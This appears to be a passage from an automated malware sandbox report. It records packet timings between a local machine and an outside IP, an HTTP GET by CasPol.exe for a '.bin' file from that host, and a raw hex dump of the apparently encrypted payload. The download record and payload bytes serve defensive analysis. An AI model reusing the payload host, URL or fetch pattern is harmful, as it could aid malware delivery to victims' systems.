                                                            May 25, 2022 22:44:01.756782055 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.756833076 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756836891 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.756891012 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756907940 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.756953955 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.756978989 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.757015944 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757061958 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757110119 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757114887 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.757153988 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.757184029 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757213116 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.757246971 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757297039 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757301092 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.757354021 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757400036 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757411957 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.757466078 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.757471085 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.757556915 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.757637024 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.760592937 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.760972977 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776019096 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776097059 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776154995 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776319981 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776365995 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776386976 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776417017 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776472092 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776475906 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776551962 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776552916 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776626110 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776683092 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776715040 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776751041 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776796103 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776818991 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776859045 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776901007 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.776940107 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.776969910 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777030945 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777062893 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777096987 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777112007 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777173042 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777190924 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777249098 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777271032 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777326107 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777378082 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777385950 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777431011 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777456045 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777504921 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777539015 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777594090 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777601957 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777657032 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777707100 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777710915 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777769089 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777772903 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777828932 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777846098 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777894020 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.777925968 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.777951956 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778002024 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778043032 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778053999 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778096914 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778111935 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778167009 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778168917 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778227091 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778259039 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778285980 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778337955 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778378010 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778389931 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778430939 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778448105 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778502941 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778563023 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778592110 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778629065 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.778712988 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.778758049 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.779309988 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.779467106 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.779566050 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.779758930 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.797081947 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797149897 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797197104 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797247887 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797250986 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.797307968 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.797413111 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.797492027 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797544003 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797589064 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797636986 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797640085 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.797705889 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.797746897 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.797799110 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.797880888 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798012972 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798063993 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798110008 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798155069 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798172951 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798223019 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798232079 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798290014 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798337936 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798382998 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798401117 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798448086 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798449039 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798532009 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798571110 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798612118 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798633099 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798688889 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798738003 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798779011 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798788071 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798835993 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798851967 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798898935 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.798914909 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.798973083 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799020052 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799062014 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.799072027 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799107075 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.799137115 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799184084 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.799190998 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799247980 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799266100 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.799312115 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799360037 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799406052 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799451113 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799495935 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799540997 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799586058 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799631119 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799652100 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.799695015 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799742937 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799787998 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799833059 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799877882 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799899101 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.799947023 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.799995899 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800015926 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800060034 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800107956 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800148010 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800159931 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800162077 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800224066 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800273895 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800276041 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800337076 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800348997 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800401926 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800452948 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800498009 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800543070 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800587893 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800632954 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800647020 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800698042 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800700903 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800746918 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800762892 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800820112 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800822020 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800880909 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800929070 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.800975084 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.800976038 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801033974 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801038980 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801091909 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801096916 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801155090 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801182032 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801214933 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801264048 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801300049 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801315069 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801352978 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801373005 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801424980 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801428080 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801484108 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801515102 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801539898 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801590919 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801631927 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801640034 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801687002 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801700115 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801748991 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801759005 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801815987 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801847935 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801870108 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801920891 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.801965952 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.801971912 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.802027941 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.802090883 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.802182913 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.820030928 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820291996 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.820347071 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820444107 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820497990 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.820525885 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820615053 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820621967 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.820700884 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820703030 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.820765972 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.820782900 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820873022 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820957899 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.820976973 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.821024895 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.821037054 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.821084976 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:44:01.821140051 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:44:01.821301937 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:45:51.619007111 CEST4976380192.168.11.202.56.57.22
                                                            May 25, 2022 22:45:51.637706995 CEST80497632.56.57.22192.168.11.20
                                                            May 25, 2022 22:45:51.637911081 CEST4976380192.168.11.202.56.57.22
                                                            • 2.56.57.22
                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.11.20497632.56.57.2280C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            TimestampkBytes transferredDirectionData
                                                            May 25, 2022 22:44:01.684322119 CEST10413OUTGET /yendexoriginwithoutfilter_rtSDhNF87.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 2.56.57.22
                                                            Cache-Control: no-cache
                                                            May 25, 2022 22:44:01.702908993 CEST10415INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Wed, 25 May 2022 16:11:12 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "f3e0cdd5270d81:0"
                                                            Server: Microsoft-IIS/10.0
                                                            Date: Wed, 25 May 2022 20:44:01 GMT
                                                            Content-Length: 219200
                                                            Data Raw: 88 87 c7 f6 20 02 7c a8 be 0f 6a e9 29 8e 51 dd 44 02 e0 2a 7f 41 71 6c d0 84 8d 68 47 88 24 43 34 be 28 b9 1c 1a 8b 23 46 82 7a df e0 b0 53 78 1b b2 05 c2 86 12 85 00 c8 36 be 12 ab 6b bd 88 0d 1c ef 4c 98 5f 9e 66 72 bd 2e 0d be f3 b3 cf e0 96 85 7f eb f0 a5 e9 4b f2 07 bf ec 14 b6 d0 49 4d b0 b4 69 16 bf 75 4d 6f d4 78 e4 5d de 3e 95 44 43 01 e8 c5 1a 9e a4 d0 f4 9f 24 0d fb 41 72 bb 35 ff a1 5d 5b 48 04 d2 7e 3b 18 bd 5c cd 8d 94 47 95 e4 4d e3 99 31 80 01 14 48 f5 ce 8e 19 e9 ce d6 d6 16 81 5d 9a 02 57 aa c8 66 f0 a1 c6 9c 98 cd 37 16 34 47 27 ba 21 e3 1f fc 13 e1 df 0c c8 37 e5 b7 ea 5d 31 ba 76 cb b7 ec b5 44 6d e6 d6 0d c7 43 bc dd 8a 07 6f ae be 4e d2 26 34 c3 ab 50 8b b1 15 5c cd e2 9d 4e 56 52 b2 e2 a9 57 21 ec 58 27 6a 1e d9 8e be fd 46 50 6b bb 41 44 d8 12 e3 17 8d 92 e4 17 d9 05 99 2a 53 81 16 9d 10 95 67 9a e3 ec c0 46 78 b3 84 83 be 49 7b 82 5a fe 79 e4 70 ea ae 40 ce a0 ca 2b 81 5d cb c7 fa 49 16 04 4a 40 4e d3 26 06 0a 71 fc b9 74 22 b9 a9 11 be 36 b3 fe e5 2d 5c ca 08 11 fe 68 cf 08 60 85 0f 69 24 88 f0 7e d5 c7 d9 db db fa b8 75 4e 17 85 dd 14 69 3f b5 08 b4 8b 50 8d 43 15 e5 79 9a a7 96 17 5c a9 fe 01 1d 11 98 63 ed 7a ef 0b 82 d7 6b e4 92 9d 3f e9 e3 4f c2 1f b3 6c 2f 35 f7 10 b4 f1 ea d1 3a a1 bf c8 cd f9 41 31 92 fa 6d 12 c0 62 86 82 95 ac fd 35 b5 84 64 39 e3 4f 8b c2 7b 6f 39 9e b5 8a a8 aa 59 3a f2 81 37 7b 75 1b 27 25 13 9e 81 63 74 85 d7 29 4b 2e c6 9d 2d 11 b1 fd da e8 9b be 73 ec 5a af 4f 1f ac de ae 78 16 b9 79 5c 91 6c ee 29 02 ae f3 b0 c4 7e fd e9 4a 5a a6 aa 8b 4a ed 81 39 cb f6 d0 ab 5e ef 83 d1 03 63 fa 05 21 81 f4 15 61 03 81 2a 4f 8b 55 f9 da c4 b8 01 b5 6a dd bb 57 76 06 46 2f 84 31 bc 05 3c f8 c3 7d 64 10 8f 9f 1a 5f 1f fb 0e 0d 2e 93 bb 29 67 84 5c e7 c7 82 27 e2 d3 74 38 e5 de a4 b1 2a 3c d7 7a 10 a6 3d 54 d9 de 9a f1 94 19 9d a0 e2 f2 d5 fb 32 6a 35 73 13 de 70 08 cf ab 09 74 5d e5 5c 03 fb 5a d3 29 8b 38 bf e0 e4 08 24 26 16 d7 8d 95 a0 d0 54 8f 1d 9e ec e2 29 d0 cf f4 35 6a b2 b7 4c 11 1a 66 d2 1c a6 d8 bb 69 36 e7 fb c8 d9 b4 61 2a e7 0f 45 89 4a 37 d6 46 a9 5b 7a be 4b c2 a8 c2 7d 0f 69 d7 70 85 e3 f0 48 30 51 f2 96 50 ff 7a 6d 96 17 48 bc 90 58 b2 81 a5 d1 50 2c 19 84 c2 d0 34 a3 b2 c6 06 de 81 90 e6 16 02 6a 74 1b 9a 11 54 76 a0 39 2b 3b 6b ef 12 ec fc 63 10 a6 4c 6b 09 6a 7a 9e 91 30 46 16 ac 82 af fe 71 07 36 d2 d2 74 3a 6e 8b 18 13 2c 87 e3 2c ea f0 27 1f f7 5b d0 d7 90 23 28 f2 7b e4 e0 e9 97 0d 2e 74 e7 37 b9 f0 bd 2d 65 bb ea f6 b3 4c 4d 4e 1d 5d 0b 1b 13 3f b1 04 e7 4c 9e 39 f2 c4 d1 a9 eb 6f 09 79 6f db 7d 8d 65 84 bd 02 7f 63 fe c1 aa dd 31 2c f4 6e 91 ed fe 5b fd 04 8c bc 2c 3b 6b 52 bd a3 b6 96 5a 70 7d cd a7 10 f8 d7 60 9c 17 25 b5 19 7c 5c ca 96 c0 33 ca c0 98 f4 13 bc 3a f0 41 46 64 e8 5e d8 f3 10 89 82 51 d9 f6 ab 92 03 89 ae 5a 3f 2b af ed 08 47 5e 81 4d b7 5d b5 64 5d 5e 50 09 41 0c b7 a0 55 96 85 75 c1 e3 95 eb 0b dc 07 bf ec 11 b6 d0 58 5b bb 9f 72 16 b8 62 b3 6e f8 7a fc 56 de 39 83 ba 42 2d ea d2 11 9e a3 c8 0a 9e 88 0f d0 43 57 47 8d f2 89 f8 52 85 2f 42 6d 77 d5 96 22 a5 e4 f4 57 e7 96 0a 84 eb 50 eb 21 77 38 8d ab ca 76 c9 ab a4 08 65 d8 31 a2 60 39 8d 9a d7 a2 ad a9 e4 f7 a8 1e 03 c7 4c 2f b8 0a e1 34 1f 11 c9 9c 49 c8 3d 83 a5 d9 5f f1 41 92 aa b7 eb b5 44 7c f0 dd 26 3c 43 b9 cb 7f 07 48 ac a6 0b d1 21 22 35 aa 7c 89 a6 1e 5c 74 97 60 4f 7a 70 99 e0 82
                                                            Data Ascii: |j)QD*AqlhG$C4(#FzSx6kL_fr.KIMiuMox]>DC$Ar5][H~;\GM1H]Wf74G'!7]1vDmCoN&4P\NVRW!X'jFPkAD*SgFxI{Zyp@+]IJ@N&qt"6-\h`i$~uNi?PCy\czk?Ol/5:A1mb5d9O{o9Y:7{u'%ct)K.-sZOxy\l)~JZJ9^c!a*OUjWvF/1<}d_.)g\'t8*<z=T2j5spt]\Z)8$&T)5jLfi6a*EJ7F[zK}ipH0QPzmHXP,4jtTv9+;kcLkjz0Fq6t:n,,'[#({.t7-eLMN]?L9oyo}ec1,n[,;kRZp}`%|\3:AFd^QZ?+G^M]d]^PAUuX[rbnzV9B-CWGR/Bmw"WP!w8ve1`9L/4I=_AD|&<CH!"5|\t`Ozp
                                                            May 25, 2022 22:44:01.702997923 CEST10416INData Raw: b4 f1 e9 58 27 28 36 cd ae be f7 6c 41 5b b9 45 6c d8 12 e3 1f 8d 92 f1 01 d2 2e 82 2a 54 96 e8 5c 3f 97 7f 93 e3 eb d6 b8 79 9f 84 94 f5 cc 7c 9a b4 ff 55 f6 5b e8 85 a3 dc 88 df 3b 81 57 e1 d4 ca 4b 06 47 4a 40 4e da 26 06 1b 67 f7 92 2b 4f bd
                                                            Data Ascii: X'(6lA[El.*T\?y|U[;WKGJ@N&g+Od.\'h#k<y9sNp4uQAyhp6Iik?LMy*5p:V1G`>u/d|wY:<@3{u dmyG-:1X]l
                                                            May 25, 2022 22:44:01.703083038 CEST10418INData Raw: 07 de 85 a9 b3 1f 29 77 5c 3f 8d ef 5f 72 e6 23 20 3d 44 dd ec ed da e1 08 ad 4c 68 39 b1 7b b2 99 33 01 3f 4f fa 86 d8 71 03 53 f0 f5 74 30 4e 18 3f 11 2c af 90 04 ea f2 2d 15 e0 59 25 fa ad 23 2f e3 f6 cc cc eb 85 69 04 73 f1 c3 be cb d0 11 6e
                                                            Data Ascii: )w\?_r# =DLh9{3?OqSt0N?,-Y%#/isnnMaL6_l%-R)Vg}w}CtLSlS`Rs&wrVHJ1:T<:}JGG/T}x)8@FujPfrA&ZCd=dC~T
